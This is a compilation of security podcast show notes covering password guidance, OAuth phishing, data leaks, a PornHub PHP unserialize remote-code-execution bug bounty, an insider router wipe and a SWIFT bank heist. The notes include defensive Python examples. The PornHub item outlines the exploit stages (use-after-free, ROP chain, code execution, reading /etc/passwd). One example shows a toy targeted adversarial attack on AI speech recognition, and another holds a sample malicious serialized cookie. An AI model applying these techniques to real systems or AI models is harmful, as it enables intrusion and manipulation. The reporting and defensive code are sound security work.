VLAN – Jupiter Broadcasting
https://www.jupiterbroadcasting.com

Keeping Systems Simple | TechSNAP 403
https://original.jupiterbroadcasting.net/131156/keeping-systems-simple-techsnap-403/
Fri, 10 May 2019 21:00:15 +0000

Show Notes: techsnap.systems/403

The post Keeping Systems Simple | TechSNAP 403 first appeared on Jupiter Broadcasting.

We Found Another Spectre, Meltdown Flaw | Ask Noah Show 66
https://original.jupiterbroadcasting.net/125096/we-found-another-spectre-meltdown-flaw-ask-noah-show-66/
Thu, 24 May 2018 12:00:18 +0000

Show Notes: podcast.asknoahshow.com/66

Here Come the Script Kiddies | TechSNAP 354
https://original.jupiterbroadcasting.net/122057/here-come-the-script-kiddies-techsnap-354/
Thu, 01 Feb 2018 21:30:47 +0000

Show Notes:

Audio Adversarial Examples

We have constructed targeted audio adversarial examples on speech-to-text transcription neural networks: given an arbitrary waveform, we can make a small perturbation that when added to the original waveform causes it to transcribe as any phrase we choose.
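As an added illustration (not code from the paper or the show), the block below runs the same targeted, gradient-sign iteration the paper applies to a speech-to-text network against a constructed eight-feature linear model, where the gradient of the class margin is just a difference of two weight rows. The weights, the input vector and the class names are all constructed; nothing here touches audio. The point is only to show how a perturbation bounded by `eps` moves the prediction to a chosen target.

```python
# Added example (not from the paper or the show): a targeted adversarial perturbation
# against a small linear "classifier", using the projected gradient-sign iteration that
# targeted attacks on neural networks also use. Weights, input and class names are
# constructed; a real attack differentiates through the speech-to-text network.


def logits(model, x):
    """Class scores z_k = W_k . x + b_k for a linear model (W rows, b biases)."""
    W, b = model
    return [sum(w_i * x_i for w_i, x_i in zip(w, x)) + b_k for w, b_k in zip(W, b)]


def predict(model, x):
    z = logits(model, x)
    return max(range(len(z)), key=lambda k: z[k])


def targeted_perturbation(model, x0, target, eps=0.6, alpha=0.1, steps=100, margin=0.05):
    """
    Find x near x0 (max |x_i - x0_i| <= eps) that the model classifies as `target`.
    Each step moves along sign(grad_x (z_target - z_strongest_other)) and projects back
    into the L-infinity ball around x0. For a linear model that gradient is closed form:
    W[target] - W[other]. Stops once the target logit leads by `margin`.
    Returns (perturbed input, number of steps taken).
    """
    W, _ = model
    x = list(x0)
    for done in range(steps + 1):
        z = logits(model, x)
        other = max((k for k in range(len(z)) if k != target), key=lambda k: z[k])
        if z[target] - z[other] > margin:
            return x, done
        grad = [wt - wo for wt, wo in zip(W[target], W[other])]
        x = [xi + alpha * (1 if g > 0 else -1 if g < 0 else 0) for xi, g in zip(x, grad)]
        x = [min(max(xi, x0i - eps), x0i + eps) for xi, x0i in zip(x, x0)]  # project
    raise RuntimeError("perturbation budget too small: target not reached")


def linf(delta):
    return max(abs(d) for d in delta)


# Constructed toy: 8 "band energies" standing in for a waveform, 3 output phrases.
TOY_MODEL = (
    [[1, 0, 0, 0, 1, 0, 0, 0],
     [0, 1, 0, 0, 0, 1, 0, 0],
     [0, 0, 1, 0, 0, 0, 1, 0]],
    [0.0, 0.0, 0.0],
)
CLASS_NAMES = ["yes", "no", "open the door"]        # constructed labels
X0 = [1.0, 0.2, 0.1, 0.0, 0.9, 0.1, 0.2, 0.0]       # constructed input, transcribed "yes"


def demo(target=2):
    """Perturb X0 so the toy model outputs CLASS_NAMES[target]; report how far it moved."""
    x_adv, iterations = targeted_perturbation(TOY_MODEL, X0, target)
    delta = [a - b for a, b in zip(x_adv, X0)]
    return {
        "before": CLASS_NAMES[predict(TOY_MODEL, X0)],
        "after": CLASS_NAMES[predict(TOY_MODEL, x_adv)],
        "iterations": iterations,
        "linf": linf(delta),
    }


if __name__ == "__main__":
    print(demo())
```

Run it and the input transcribed as "yes" comes out as "open the door" after five steps with no coordinate moved by more than 0.5. The `margin` argument makes the loop stop only once the target logit clearly leads, so rounding cannot undo the result; against a real network the gradient comes from automatic differentiation rather than the closed form used here, but the sign step and the projection are the same.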

Keylogger Found in Many WordPress Sites

But, in a twist, this particular attack isn’t just interested in mining Monero. While the website’s front-end is digging for cryptocurrencies, the back-end is secretly hosting a keylogger designed to steal unsuspecting users’ login credentials.

Pre-Reqs to using WordPress
  • Root privileges, or sudo, on the host.
  • Install a LAMP stack (Linux, Apache, MySQL/MariaDB, PHP) or an equivalent web server, database and PHP runtime.
  • Serve the site over TLS: WordPress serves dynamic content and handles user login and authorization, so without TLS the credentials and session cookies cross the network in the clear. TLS (still commonly called SSL) encrypts the traffic between the browser and the site.
  • Create a MySQL Database

QubesOS is Re-Architecting

This leads us to a conclusion that, at least for some applications, we would like to be able to achieve better isolation than currently available hypervisors and commodity hardware can provide.

Making Network Authentication Simple

We are a non-profit student organization providing Internet access to ~2000 people living on campus. We manage all the active network equipment, and users simply have access to RJ45 wall sockets and shared Wi-Fi access points. Last year, as we were leaving our historic campus and moving into a freshly built one at Paris-Saclay, we set out to build a more modern and robust network infrastructure for our users.


“Autosploit” tool sparks fears

400 lines of Python code + Shodan + Metasploit equals a whole heap of hand-wringing.

AutoSploit, a new tool released by a “cyber security enthusiast” has done more than spark controversy, however, by combining two well-known tools into an automatic hunting and hacking machine—in much the same way people already could with an hour or two of copy-pasting scripts together.

All Drives Die | TechSNAP 318
https://original.jupiterbroadcasting.net/114566/all-drives-die-techsnap-318/
Tue, 09 May 2017 20:39:41 +0000

Show Notes:

New password guidelines say everything we thought about passwords is wrong

  • No more periodic password changes

  • No more imposed password complexity

  • Mandatory validation of newly created passwords against a list of commonly-used, expected, or compromised passwords.

  • We recommend you use a password manager and a different password for every login

  • Rainbow tables are precomputed tables that map hashes back to passwords; a unique per-password salt makes that precomputation useless, which is why stored passwords should be salted and hashed with a slow, purpose-built function such as bcrypt or Argon2
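An added example, not from the show or from NIST, of an acceptance check that follows those guidelines: a length floor, no composition rules, no expiry, a check for repetitive or sequential characters and for context-specific values such as the username, and a lookup against a compromised-password list. The breach list is a constructed six-entry stand-in stored as SHA-1 digests bucketed by their first five hex characters, the way range-query services let a client look up a hash without sending it in full; `range_lookup` takes the place of that network call. Function names are my own.

```python
import hashlib

# Added example (not from the show or NIST): a password acceptance check in the
# SP 800-63B style summarised above. The breach list is a constructed stand-in.

CONSTRUCTED_BREACH_LIST = {"password", "123456", "qwerty", "letmein", "iloveyou", "Summer2019!"}


def sha1_hex(text):
    return hashlib.sha1(text.encode("utf-8")).hexdigest().upper()


# prefix (first 5 hex chars of the SHA-1) -> set of suffixes; a client sends only the prefix
_BUCKETS = {}
for _pw in CONSTRUCTED_BREACH_LIST:
    _h = sha1_hex(_pw)
    _BUCKETS.setdefault(_h[:5], set()).add(_h[5:])


def range_lookup(prefix):
    """Stand-in for the network range query: every known suffix for a 5-char prefix."""
    return _BUCKETS.get(prefix, set())


def is_compromised(password):
    h = sha1_hex(password)
    return h[5:] in range_lookup(h[:5])


def longest_trivial_run(password):
    """Longest run of repeated or consecutive characters ('aaaa', 'abcd', '4321')."""
    best = run = 1
    direction = None
    for prev, cur in zip(password, password[1:]):
        d = ord(cur) - ord(prev)
        if d in (-1, 0, 1) and (direction is None or d == direction):
            run += 1
            direction = d
        else:
            run = 2 if d in (-1, 0, 1) else 1
            direction = d if d in (-1, 0, 1) else None
        best = max(best, run)
    return best


def check_password(password, context=()):
    """
    Reasons the password must be rejected (empty list = acceptable).
    No composition rules and no upper bound are imposed: long passphrases are welcome.
    `context` holds values the password must not contain (username, service name, ...).
    """
    problems = []
    if len(password) < 8:
        problems.append("shorter than 8 characters")
    if is_compromised(password):
        problems.append("found in compromised-password list")
    if longest_trivial_run(password) >= 4:
        problems.append("repetitive or sequential characters")
    lowered = password.lower()
    for word in context:
        if word and word.lower() in lowered:
            problems.append(f"contains context-specific value '{word}'")
    return problems


# Constructed candidates with the username they would be registered under.
CONSTRUCTED_CANDIDATES = [
    ("password", ("jsmith",)),
    ("Summer2019!", ("jsmith",)),
    ("jsmith_rocks", ("jsmith",)),
    ("abcd1234", ()),
    ("correct horse battery staple", ()),
]


def evaluate(candidates=CONSTRUCTED_CANDIDATES):
    return {pw: check_password(pw, ctx) for pw, ctx in candidates}


if __name__ == "__main__":
    for pw, problems in evaluate().items():
        print(f"{pw!r}: {'OK' if not problems else '; '.join(problems)}")
```

Only the four-word passphrase passes; "Summer2019!" would satisfy every classic complexity rule and is rejected purely because it appears in the breach list, which is the point of the new guidance.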

Enterprise hard disks are faster and use more power, but are they more reliable?

  • The enterprise disks also use more power: 9W idle and 10W operational, compared to 7.2W idle and 9W operational for comparable consumer disks.

  • If you have one or two spindles, that’s no big deal, but each Backblaze rack has 20 “storage pods” with 60 disks each. An extra 2.2kW for an idle rack is nothing to sniff at.

  • Other HGST models are also continuing to show impressive longevity, with three 4TB models and one 3TB model all boasting a sub-1 percent annualized failure rate.

Don’t trust OAuth: Why the “Google Docs” worm was so convincing

  • Access to all your mail

  • Access to any of your Google Hangouts chats

  • Access to all your contacts

  • Makes a good case for encryption and decryption at the client: a token granted to a third-party app can read whatever the server can read, but not what was encrypted before it reached the server

  • OAuth
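An added example (not the show's or Google's code) of what a user, or a browser extension acting for the user, can actually check before clicking Allow: the scopes and the redirect target in the authorization URL, since the application name on the consent screen is whatever the registrant typed. The Google scope strings are the documented ones, but the risk labels, the client ID, the redirect host and the URL itself are constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Added example (not from the show): pre-consent review of an OAuth authorization URL.
# The scope-to-risk table is an assumption for illustration; verify scope strings
# against the provider's own documentation.

BROAD_SCOPES = {
    "https://mail.google.com/": "full read/send/delete access to mail",
    "https://www.googleapis.com/auth/gmail.modify": "read and modify mail",
    "https://www.googleapis.com/auth/contacts": "read and write all contacts",
    "https://www.googleapis.com/auth/contacts.readonly": "read all contacts",
    "https://www.googleapis.com/auth/drive": "full access to Drive files",
}


def review_authorization_url(url, expected_redirect_hosts):
    """
    Flag what a consent request would really grant. Returns the client_id, the
    requested scopes and a list of findings (empty = nothing alarming).
    """
    q = parse_qs(urlsplit(url).query)
    scopes = q.get("scope", [""])[0].split()
    redirect = urlsplit(q.get("redirect_uri", [""])[0])
    findings = []
    for s in scopes:
        if s in BROAD_SCOPES:
            findings.append(f"broad scope {s}: {BROAD_SCOPES[s]}")
    if redirect.scheme != "https":
        findings.append(f"redirect_uri is not https: {redirect.geturl()!r}")
    if redirect.hostname not in expected_redirect_hosts:
        findings.append(f"redirect_uri host {redirect.hostname!r} is not one you expected")
    if q.get("access_type", [""])[0] == "offline":
        findings.append("offline access requested: a refresh token keeps working after you close the tab")
    return {"client_id": q.get("client_id", [""])[0], "scopes": scopes, "findings": findings}


# Constructed consent URL: a third-party app asking for full mail and contacts access,
# sending the authorization code to a host that is not Google's.
CONSTRUCTED_URL = (
    "https://accounts.google.com/o/oauth2/v2/auth"
    "?client_id=123456789-example.apps.googleusercontent.com"
    "&redirect_uri=https%3A%2F%2Fdocs-share.example%2Fcallback"
    "&response_type=code"
    "&scope=openid%20email%20https%3A%2F%2Fmail.google.com%2F"
    "%20https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcontacts"
    "&access_type=offline"
)

if __name__ == "__main__":
    report = review_authorization_url(CONSTRUCTED_URL, {"docs.google.com"})
    print("client:", report["client_id"])
    for f in report["findings"]:
        print(" -", f)
```

Against the constructed URL the review produces four findings: two broad scopes, an unexpected redirect host and a request for offline access. An app that only needs to know who you are asks for `openid email`, and that request produces no findings at all.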


Bad Boy Backups | TechSNAP 309
https://original.jupiterbroadcasting.net/107361/bad-boy-backups-techsnap-309/
Tue, 07 Mar 2017 21:42:43 +0000

Show Notes:

Data from connected CloudPets teddy bears leaked and ransomed, exposing kids’ voice messages

  • Extortionists Wipe Thousands of Databases, Victims Who Pay Up Get Stiffed

  • Spiral Toys xCEO denies voice recordings stolen

  • CloudPets left their database exposed publicly to the web without so much as a password to protect it.

  • There are references to almost 2.2 million voice recordings of parents and their children exposed by databases that should never have contained production data.

  • CloudPets has absolutely no password strength rules

  • The CloudPets Twitter account has also been dormant since July last year so combined with the complete lack of response to all communications, it looks like operations have well and truly been shuttered.

Spammers expose their entire operation through bad backups

  • Today we release details on the inner workings of a massive, illegal spam operation. The situation presents a tangible threat to online privacy and security as it involves a database of 1.4 billion email accounts combined with real names, user IP addresses, and often physical address. Chances are that you, or at least someone you know, is affected. Spammergate: The Fall of an Empire

  • The data from this well-known, but slippery spamming operation, was discovered by Chris Vickery, a security researcher for MacKeeper and shared with Salted Hash, Spamhaus, as well as relevant law enforcement agencies.

  • Vickery also discovered thousands of warm-up email accounts used by RCM to skirt anti-spam measures

  • RCM’s data breach also exposed 2,199 IP addresses used for public-faced activities; as well as the group’s internal assets. This is in addition to the 60 IP blocks RCM has identified for activities in the past, as well as current and future operations; and the 140 active DNS servers that are rotated frequently.

  • Based on campaign logging documents, the data breach also exposed more than 300 active MX records. In just two spreadsheets alone, RCM recorded nearly 100,000 domains used for their campaigns.

  • If an offer doesn’t inbox (meaning it is rejected, or otherwise dumped into a spam or junk folder), or a given domain is blacklisted, RCM goes back to a list of thousands of domains and selects another to restart the process.


Internet Power Struggle | TechSNAP 277
https://original.jupiterbroadcasting.net/101521/internet-power-struggle-techsnap-277/
Thu, 28 Jul 2016 21:35:20 +0000


We’re in the middle of an epic battle for power in cyberspace & Bruce Schneier breaks it down. PHP gets broken, PornHub gets hacked & the disgruntled employee who wiped the router configs on his way out the door.

Plus great emails, a packed round up & more!

Show Notes:

Power in the Age of the Feudal Internet

  • “We’re in the middle of an epic battle for power in cyberspace. On one side are the nimble, unorganized, distributed powers such as dissident groups, criminals, and hackers. On the other side are the traditional, organized, institutional powers such as governments and large multinational corporations. During its early days, the Internet gave coordination and efficiency to the powerless. It made them powerful, and seem unbeatable. But now the more traditional institutional powers are winning, and winning big. How these two fare long-term, and the fate of the majority of us that don’t fall into either group, is an open question – and one vitally important to the future of the Internet.”
  • “In its early days, there was a lot of talk about the “natural laws of the Internet” and how it would empower the masses, upend traditional power blocks, and spread freedom throughout the world. The international nature of the Internet made a mockery of national laws. Anonymity was easy. Censorship was impossible. Police were clueless about cybercrime. And bigger changes were inevitable. Digital cash would undermine national sovereignty. Citizen journalism would undermine the media, corporate PR, and political parties. Easy copying would destroy the traditional movie and music industries. Web marketing would allow even the smallest companies to compete against corporate giants. It really would be a new world order.”
  • “On the corporate side, power is consolidating around both vendor-managed user devices and large personal-data aggregators. It’s a result of two current trends in computing. First, the rise of cloud computing means that we no longer have control of our data. Our e-mail, photos, calendar, address book, messages, and documents are on servers belonging to Google, Apple, Microsoft, Facebook, and so on. And second, the rise of vendor-managed platforms means that we no longer have control of our computing devices. We’re increasingly accessing our data using iPhones, iPads, Android phones, Kindles, ChromeBooks, and so on. Even Windows 8 and Apple’s Mountain Lion are heading in the direction of less user control.”
  • “I have previously called this model of computing feudal. Users pledge allegiance to more powerful companies who, in turn, promise to protect them from both sysadmin duties and security threats. It’s a metaphor that’s rich in history and in fiction, and a model that’s increasingly permeating computing today.”
  • “Feudal security consolidates power in the hands of the few. These companies act in their own self-interest. They use their relationship with us to increase their profits, sometimes at our expense. They act arbitrarily. They make mistakes.”
  • “Government power is also increasing on the Internet. Long gone are the days of an Internet without borders, and governments are better able to use the four technologies of social control: surveillance, censorship, propaganda, and use control. There’s a growing “cyber sovereignty” movement that totalitarian governments are embracing to give them more control – a change the US opposes, because it has substantial control under the current system. And the cyberwar arms race is in full swing, further consolidating government power.”
  • “What happened? How, in those early Internet years, did we get the future so wrong?”
  • “The truth is that technology magnifies power in general, but the rates of adoption are different. The unorganized, the distributed, the marginal, the dissidents, the powerless, the criminal: they can make use of new technologies faster. And when those groups discovered the Internet, suddenly they had power. But when the already powerful big institutions finally figured out how to harness the Internet for their needs, they had more power to magnify. That’s the difference: the distributed were more nimble and were quicker to make use of their new power, while the institutional were slower but were able to use their power more effectively. So while the Syrian dissidents used Facebook to organize, the Syrian government used Facebook to identify dissidents.”
  • “There’s another more subtle trend, one I discuss in my book Liars and Outliers. If you think of security as an arms race between attackers and defenders, technological advances – firearms, fingerprint identification, lockpicks, the radio – give one side or the other a temporary advantage. But most of the time, a new technology benefits the attackers first.”
  • “It’s quick vs. strong. To return to medieval metaphors, you can think of a nimble distributed power – whether marginal, dissident, or criminal – as Robin Hood. And you can think of ponderous institutional power – both government and corporate – as the Sheriff of Nottingham.”
  • “So who wins? Which type of power dominates in the coming decades? Right now, it looks like institutional power.”
  • “This is largely because leveraging power on the Internet requires technical expertise, and most distributed power groups don’t have that expertise. Those with sufficient technical ability will be able to stay ahead of institutional power. Whether it’s setting up your own e-mail server, effectively using encryption and anonymity tools, or breaking copy protection, there will always be technologies that are one step ahead of institutional power. This is why cybercrime is still pervasive, even as institutional power increases, and why organizations like Anonymous are still a social and political force. If technology continues to advance – and there’s no reason to believe it won’t – there will always be a security gap in which technically savvy Robin Hoods can operate.”
  • “My main concern is for the rest of us: everyone in the middle. These are people who don’t have the technical ability to evade either the large governments and corporations that are controlling our Internet use, or the criminal and hacker groups who prey on us. These are the people who accept the default configuration options, arbitrary terms of service, NSA-installed back doors, and the occasional complete loss of their data. In the feudal world, these are the hapless peasants. And it’s even worse when the feudal lords – or any powers – fight each other. As anyone watching Game of Thrones knows, peasants get trampled when powers fight: when Facebook, Google, Apple, and Amazon fight it out in the market; when the US, EU, China, and Russia fight it out in geopolitics; or when it’s the US vs. the terrorists or China vs. its dissidents. The abuse will only get worse as technology continues to advance. In the battle between institutional power and distributed power, more technology means more damage. Cybercriminals can rob more people more quickly than criminals who have to physically visit everyone they rob. Digital pirates can make more copies of more things much more quickly than their analog forebears. And 3D printers mean that the data use restriction debate now involves guns, not movies. It’s the same problem as the “weapons of mass destruction” fear: terrorists with nuclear or biological weapons can do a lot more damage than terrorists with conventional explosives.”
  • “The more destabilizing the technologies, the greater the rhetoric of fear, and the stronger institutional power will get. This means even more repressive security measures, even if the security gap means that such measures are increasingly ineffective. And it will squeeze the peasants in the middle even more.”
  • “Transparency and oversight give us the confidence to trust institutional powers to fight the bad side of distributed power, while still allowing the good side to flourish. For if we are going to entrust our security to institutional powers, we need to know they will act in our interests and not abuse that power. Otherwise, democracy fails.”
  • “This won’t be an easy period for us as we try to work these issues out. Historically, no shift in power has ever been easy. Corporations have turned our personal data into an enormous revenue generator, and they’re not going to back down. Neither will governments, who have harnessed that same data for their own purposes. But we have a duty to tackle this problem.”
  • “Data is the pollution problem of the information age. All computer processes produce it. It stays around. How we deal with it — how we reuse and recycle it, who has access to it, how we dispose of it, and what laws regulate it — is central to how the information age functions. And I believe that just as we look back at the early decades of the industrial age and wonder how society could ignore pollution in their rush to build an industrial world, our grandchildren will look back at us during these early decades of the information age and judge us on how we dealt with the rebalancing of power resulting from all this new data.”
  • “I can’t tell you what the result will be. These are all complicated issues, and require meaningful debate, international cooperation, and innovative solutions. We need to decide on the proper balance between institutional and decentralized power, and how to build tools that amplify what is good in each while suppressing the bad.”

How we broke PHP, hacked PornHub, and earned $20,000

  • As we covered a few months ago, PornHub has opened up their new bug bounty program via Hackerone.com
  • Now, a group of researchers have collected a $20,000 bounty, and are sharing the details of how they did it
  • “We have gained remote code execution on pornhub.com and have earned a $20,000 bug bounty on Hackerone. We were also awarded with $2,000 by the Internet Bug Bounty committee”
  • “We have found two use-after-free vulnerabilities in PHP’s garbage collection algorithm. Those vulnerabilities were remotely exploitable over PHP’s unserialize function.”
  • “After analyzing the platform we quickly detected the usage of unserialize on the website. Multiple paths (everywhere where you could upload hot pictures and so on) were affected”
  • “In all cases a parameter named “cookie” got unserialized from POST data and afterwards reflected via Set-Cookie headers”
  • So whatever data you sent to the website while uploading was serialized and set as a cookie, and that cookie was unserialized and read back in on each subsequent request. Carrying serialized state in a client-side cookie is one way of maintaining state across requests, but it means attacker-controlled bytes reach unserialize on every request.
  • When the researchers modified the POST request to include a serialized PHP Exception object, the PornHub website reacted to the exception
  • “This might strike as a harmless information disclosure at first sight, but generally it is known that using user input on unserialize is a bad idea”
  • “The core unserializer alone is relatively complex as it involves more than 1200 lines of code in PHP 5.6. Further, many internal PHP classes have their own unserialize methods. By supporting structures like objects, arrays, integers, strings or even references it is no surprise that PHP’s track record shows a tendency for bugs and memory corruption vulnerabilities. Sadly, there were no known vulnerabilities of such type for newer PHP versions like PHP 5.6 or PHP 7, especially because unserialize already got a lot of attention in the past”
  • “Hence, auditing it can be compared to squeezing an already tightly squeezed lemon. Finally, after so much attention and so many security fixes its vulnerability potential should have been drained out and it should be secure, shouldn’t it?”
  • They implemented a fuzzer and started running it. Eventually they found a bug in PHP 7, but when they tried it against PornHub it did not work, which suggested PornHub was running PHP 5.6. Running the fuzzer against PHP 5.6 generated more than 1 TB of logs, but initially no vulnerabilities.
  • “Eventually, after putting more and more effort into fuzzing we’ve stumbled upon unexpected behavior again.”
  • “A tremendous amount of time was necessary to analyze potential issues. After all, we could extract a concise proof of concept of a working memory corruption bug — a so called use-after-free vulnerability! Upon further investigation we discovered that the root cause could be found in PHP’s garbage collection algorithm, a component of PHP that is completely unrelated to unserialize. However, the interaction of both components occurred only after unserialize had finished its job. Consequently, it was not well suited for remote exploitation. After further analysis, gaining a deeper understanding for the problem’s root causes and a lot of hard work a similar use-after-free vulnerability was found that seemed to be promising for remote exploitation.”
  • “Even this promising use-after-free vulnerability was considerably difficult to exploit. In particular, it involved multiple exploitation stages.”
  • The article then goes on to explain how they exploited the use-after-free vulnerability in great detail
  • Once they had the ability to execute the code they provided, they needed a way to view the output
  • “Being able to execute arbitrary PHP code is an important step, but being able to view its output is equally important, unless one wants to deal with side channels to receive responses. So the remaining tricky part was to somehow display the result on Pornhub’s website.”
  • “Usually php-cgi forwards the generated content back to the web server so that it’s displayed on the website, but wrecking the control flow that badly creates an abnormal termination of PHP so that its result will never reach the HTTP server. To get around this problem we simply told PHP to use direct unbuffered responses that are usually used for HTTP streaming”
  • “Together with our ROP stack which was provided over POST data our payload did the following things:”
    • Created our fake object which was later on passed as a parameter to “setcookie”.
    • This caused a call to the provided add_ref function i.e. it allowed us to gain program counter control.
    • Our ROP chain then prepared all registers/parameters as discussed.
    • Next, we were able to execute arbitrary PHP code by making a call to zend_eval_string.
    • Finally, we caused a clean process termination while also fetching the output from the response body.
  • “Once running the above code we were in and got a nice view of Pornhub’s ‘/etc/passwd’ file. Due to the nature of our attack we would have also been able to execute other commands or actually break out of PHP to run arbitrary syscalls. However, just using PHP was more convenient at this point. Finally, we dumped a few details about the underlying system and immediately wrote and submitted a report to Pornhub over Hackerone.”
  • “We gained remote code execution and would’ve been able to do the following things:”
    • Dump the complete database of pornhub.com including all sensitive user information.
    • Track and observe user behavior on the platform.
    • Leak the complete available source code of all sites hosted on the server.
    • Escalate further into the network or root the system.
  • “It is well-known that using user input on unserialize is a bad idea. In particular, about 10 years have passed since its first weaknesses have become apparent. Unfortunately, even today, many developers seem to believe that unserialize is only dangerous in old PHP versions or when combined with unsafe classes. We sincerely hope to have destroyed this misbelief. Please finally put a nail into unserialize’s coffin so that the following mantra becomes obsolete.”
  • “You should never use user input on unserialize. Assuming that using an up-to-date PHP version is enough to protect unserialize in such scenarios is a bad idea. Avoid it or use less complex serialization methods like JSON.”
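An added example, written in Python rather than PHP and not part of the write-up, for teams that cannot drop a legacy cookie format overnight: a strict parser for PHP's serialize() grammar that accepts only null, booleans, integers, floats, strings and arrays and refuses the object (`O:`, `C:`) and reference (`R:`, `r:`) tokens, which are the structures the write-up names as what makes the unserializer complex. It is a front-door filter to run before the bytes reach unserialize, not a substitute for the advice above; the function names and the sample cookies are my own.

```python
# Added example (not from the write-up or PHP): a validating parser for PHP's
# serialize() format that accepts scalars and arrays only. Objects and references
# are refused before the payload is ever handed to a PHP unserialize() call.


class UnsafeSerialized(ValueError):
    """Payload uses objects or references, which have no business in a cookie."""


def _read_until(data, pos, delim):
    end = data.find(delim, pos)
    if end < 0:
        raise ValueError(f"missing {delim!r} after offset {pos}")
    return data[pos:end], end + 1


def _expect(data, pos, literal):
    if data[pos:pos + len(literal)] != literal:
        raise ValueError(f"expected {literal!r} at offset {pos}")
    return pos + len(literal)


def _parse(data, pos, depth):
    if depth > 16:
        raise ValueError("nesting too deep")
    tag = data[pos:pos + 1]
    if tag in (b"O", b"C", b"R", b"r"):
        raise UnsafeSerialized(f"refusing {tag.decode()}: token at offset {pos}")
    if tag == b"N":                                      # N;
        return None, _expect(data, pos + 1, b";")
    if tag in (b"b", b"i", b"d"):                        # b:1;  i:42;  d:1.5;
        raw, pos = _read_until(data, _expect(data, pos + 1, b":"), b";")
        if tag == b"b":
            if raw not in (b"0", b"1"):
                raise ValueError("boolean must be 0 or 1")
            return raw == b"1", pos
        return (int(raw.decode()) if tag == b"i" else float(raw.decode())), pos
    if tag == b"s":                                      # s:5:"hello";  (length in bytes)
        raw, pos = _read_until(data, _expect(data, pos + 1, b":"), b":")
        length = int(raw.decode())
        pos = _expect(data, pos, b'"')
        value = data[pos:pos + length]
        if len(value) != length:
            raise ValueError("string shorter than declared length")
        return value.decode("utf-8"), _expect(data, pos + length, b'";')
    if tag == b"a":                                      # a:2:{key;value;key;value;}
        raw, pos = _read_until(data, _expect(data, pos + 1, b":"), b":")
        count = int(raw.decode())
        pos = _expect(data, pos, b"{")
        result = {}
        for _ in range(count):
            key, pos = _parse(data, pos, depth + 1)
            if isinstance(key, bool) or not isinstance(key, (int, str)):
                raise ValueError("array keys must be integers or strings")
            result[key], pos = _parse(data, pos, depth + 1)
        return result, _expect(data, pos, b"}")
    raise ValueError(f"unknown tag {tag!r} at offset {pos}")


def parse_php_serialized(data):
    """Decode a serialize() payload into plain Python values, or raise ValueError."""
    value, pos = _parse(data, 0, 0)
    if pos != len(data):
        raise ValueError("trailing bytes after value")
    return value


def vet_cookie(raw):
    """(accepted, decoded value or reason): the decision to make before calling unserialize."""
    try:
        return True, parse_php_serialized(raw)
    except UnsafeSerialized as e:
        return False, f"blocked: {e}"
    except ValueError as e:
        return False, f"malformed: {e}"


# Constructed cookies: a benign array, and the shape of the probe described above.
BENIGN_COOKIE = b'a:2:{s:4:"lang";s:2:"en";s:4:"page";i:3;}'
PROBE_COOKIE = b'O:9:"Exception":1:{s:10:"\x00*\x00message";s:5:"hello";}'

if __name__ == "__main__":
    for cookie in (BENIGN_COOKIE, PROBE_COOKIE):
        print(cookie[:24], "->", vet_cookie(cookie))
```

The parser reads string lengths in bytes, as PHP does, so a length that does not line up with the closing `";` is rejected rather than resynchronised, and it bounds nesting depth so a pathological cookie cannot recurse without limit. Anything that is not one of the six accepted tags is an error, which is what makes the refusal of `O:` and `R:` a grammar decision rather than a blocklist.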

Ex-Citibank employee wipes router configs and downs entire network

  • “Lennon Ray Brown, 38, had been working at Citibank’s Irving, Texas, corporate office since 2012, first as a contractor and later as a staff employee, when he was called in by a manager and reprimanded for poor performance.”
  • “At that point, the US Department of Justice said, the rogue employee uploaded a series of commands to Citibank’s Global Control Center routers, deleting the config files for nine of the routers and causing traffic to be re-routed through a set of backup routers. Court documents show that while there was not a complete outage, the re-routing led to “congestion” on the network and at the branch offices.”
  • “Brown admits that on December 23, 2013, he issued commands to wipe the configuration files on 10 core routers within Citibank’s internal network. The resulting outage hit both network and phone access to 110 branches nationwide – about 90 per cent of all Citibank branch offices.”
  • Brown said the following in a text message to a coworker shortly after the incident:
    • “They was firing me. I just beat them to it. Nothing personal, the upper management need to see what they guys on the floor is capable of doing when they keep getting mistreated. I took one for the team.”
    • “Sorry if I made my peers look bad, but sometimes it take something like what I did to wake the upper management up.”
  • Brown admitted the intentional damage charge in February
  • Justice Department Announcement
  • Brown was sentenced to 21 months in prison and ordered to pay $77,000

My Kingdom for a VLAN | TechSNAP 267
https://original.jupiterbroadcasting.net/99871/my-kingdom-for-a-vlan-techsnap-267/
Thu, 19 May 2016 17:38:11 +0000


A typo stops a billion dollar bank hack, a vulnerability in 7zip that might surprise you & the best solutions for secure remote network access.

Your great questions, our answers, a packed round up & more!

Show Notes:

Attackers compromise banks and steal millions

  • Attackers compromised the credentials of Bangladesh Bank (the country’s central bank), and used those credentials to make SWIFT wire transfers
  • “Cyber criminals broke into Bangladesh Bank’s system and in early February tried to make fraudulent transfers totaling $951 million from its account at the Federal Reserve Bank of New York.”
  • Using the credentials, they started a wave of transfers. The first four went through, transferring a total of more than $81 million, one of the largest bank heists in history
  • The fifth was stopped only because of a typo
  • “a transfer for $20 million, to a Sri Lankan non-profit organization was held up because the hackers misspelled the name of the NGO, Shalika Foundation. Hackers misspelled “foundation” in the NGO’s name as “fandation”, prompting a routing bank, Deutsche Bank, to seek clarification from the Bangladesh central bank, which stopped the transaction”
  • “The details of how the hacking came to light and was stopped before it did more damage have not been previously reported. Bangladesh Bank has billions of dollars in a current account with the Fed, which it uses for international settlements.”
  • “The transactions that were stopped totaled $850-$870 million, one of the officials said”
  • So if it wasn’t for the typo, the hackers may have made off with almost $1 billion
  • “Bangladesh Bank has said it has recovered some of the money that was stolen, and is working with anti-money laundering authorities in the Philippines to try to recover the rest.”
  • “More than a month after the attack, Bangladeshi officials are scrambling to trace the money, shore up security and identify weaknesses in their systems. They said there is little hope of ever catching the hackers, and it could take months before the money is recovered, if at all.”
  • Additional Coverage
  • “Bangladesh’s central bank was vulnerable to hackers because it did not have a firewall and used second-hand, $10 switches to network computers connected to the SWIFT global payment network”
  • “The shortcomings made it easier for hackers to break into the Bangladesh Bank system earlier this year and attempt to siphon off nearly $1 billion using the bank’s SWIFT credentials, said Mohammad Shah Alam, head of the Forensic Training Institute of the Bangladesh police’s criminal investigation department.”
  • Experts in bank security said that the findings described by Alam were disturbing. “You are talking about an organization that has access to billions of dollars and they are not taking even the most basic security precautions”
  • “Two (SWIFT) engineers came and visited the bank after the heist and suggested to upgrade the system”
  • “Bangladesh police said earlier this week they had identified 20 foreigners involved in the heist but they appear to be people who received some of the payments, rather than those who initially stole the money.”
